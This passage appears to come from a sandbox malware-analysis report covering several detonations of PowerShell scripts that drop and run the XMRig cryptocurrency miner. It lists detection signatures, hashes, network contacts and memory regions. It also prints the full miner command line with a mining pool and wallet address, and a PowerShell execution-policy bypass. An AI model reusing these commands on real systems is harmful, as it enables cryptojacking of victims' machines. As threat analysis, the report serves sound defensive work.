N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4104-0-0x00007FFDCB233000-0x00007FFDCB235000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4jtm4i3.hjw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4104-9-0x000001C1C3E90000-0x000001C1C3EB2000-memory.dmp

memory/4104-10-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

memory/4104-11-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

memory/4104-12-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

memory/4104-14-0x000001C1C4390000-0x000001C1C43A2000-memory.dmp

memory/4104-15-0x000001C1C3F30000-0x000001C1C3F3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3132-46-0x000001A496C60000-0x000001A496C80000-memory.dmp

memory/3132-47-0x000001A52AAD0000-0x000001A52AAF0000-memory.dmp

memory/3132-48-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/4104-49-0x00007FFDCB230000-0x00007FFDCBCF2000-memory.dmp

memory/3132-51-0x000001A52B140000-0x000001A52B160000-memory.dmp

memory/3132-50-0x000001A52AF10000-0x000001A52AF30000-memory.dmp

memory/4104-53-0x00007FFDCB233000-0x00007FFDCB235000-memory.dmp

memory/3132-52-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-54-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-57-0x000001A52B140000-0x000001A52B160000-memory.dmp

memory/3132-56-0x000001A52AF10000-0x000001A52AF30000-memory.dmp

memory/3132-55-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-58-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-59-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-60-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-61-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-62-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-63-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-64-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-65-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-66-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-67-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-68-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-69-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-70-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-71-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-72-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-73-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-74-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-75-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-76-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-77-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-78-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-79-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-80-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-81-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-82-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-83-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-84-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-85-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-86-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-87-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-88-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-89-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-90-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-91-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-92-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-93-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-94-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-95-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-96-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-97-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-98-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-99-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-100-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-101-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-102-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-103-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-104-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-105-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-106-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-107-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-108-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-109-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-110-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-111-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-112-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-113-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-114-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-115-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

memory/3132-116-0x00007FF6B4F70000-0x00007FF6B5BA3000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:30

Platform

win11-20240426-en

Max time kernel

1790s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1104-0-0x00007FF83A093000-0x00007FF83A095000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gw1y31oc.3c0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1104-9-0x000002627EBC0000-0x000002627EBE2000-memory.dmp

memory/1104-10-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp

memory/1104-11-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp

memory/1104-12-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp

memory/1104-14-0x000002627F0B0000-0x000002627F0C2000-memory.dmp

memory/1104-15-0x000002627ED90000-0x000002627ED9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5028-46-0x000001958A420000-0x000001958A440000-memory.dmp

memory/5028-47-0x000001958A470000-0x000001958A490000-memory.dmp

memory/5028-48-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/1104-49-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp

memory/5028-50-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/1104-51-0x00007FF83A093000-0x00007FF83A095000-memory.dmp

memory/5028-54-0x000001958BD70000-0x000001958BD90000-memory.dmp

memory/5028-53-0x000001958A490000-0x000001958A4B0000-memory.dmp

memory/1104-52-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp

memory/5028-55-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-56-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-57-0x000001958A490000-0x000001958A4B0000-memory.dmp

memory/5028-58-0x000001958BD70000-0x000001958BD90000-memory.dmp

memory/5028-59-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-60-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-61-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-62-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-63-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-64-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-65-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-66-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-67-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-68-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-69-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-70-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-71-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-72-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-73-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-74-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-75-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-76-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-77-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-78-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-79-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-80-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-81-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-82-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-83-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-84-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-85-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-86-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-87-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-88-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-89-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-90-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-91-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-92-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-93-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-94-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-95-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-96-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-97-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-98-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-99-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-100-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-101-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-102-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-103-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-104-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-105-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-106-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-107-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-108-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-109-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-110-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-111-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-112-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-113-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-114-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-115-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-116-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

memory/5028-117-0x00007FF6A54B0000-0x00007FF6A60E3000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:43

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 198.111.78.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/1716-3-0x00007FFE1D623000-0x00007FFE1D624000-memory.dmp

memory/1716-5-0x00000200DFF80000-0x00000200DFFA2000-memory.dmp

memory/1716-7-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp

memory/1716-9-0x00000200E00B0000-0x00000200E0126000-memory.dmp

memory/1716-10-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0mtmfp3o.w5j.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1716-25-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp

memory/1716-48-0x00000200DFF00000-0x00000200DFF12000-memory.dmp

memory/1716-61-0x00000200DFE80000-0x00000200DFE8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4776-90-0x000002378CCC0000-0x000002378CCE0000-memory.dmp

memory/4776-91-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-92-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/1716-93-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp

memory/1716-94-0x00007FFE1D623000-0x00007FFE1D624000-memory.dmp

memory/1716-95-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp

memory/1716-96-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp

memory/4776-97-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-98-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-99-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-100-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-101-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-102-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-103-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-104-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-105-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-106-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-107-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-108-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-109-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-110-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-111-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-112-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-113-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-114-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-115-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-116-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-117-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-118-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-119-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-120-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-121-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-122-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-123-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-124-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-125-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-126-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-127-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-128-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-129-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-130-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-131-0x00007FF787C00000-0x00007FF788833000-memory.dmp

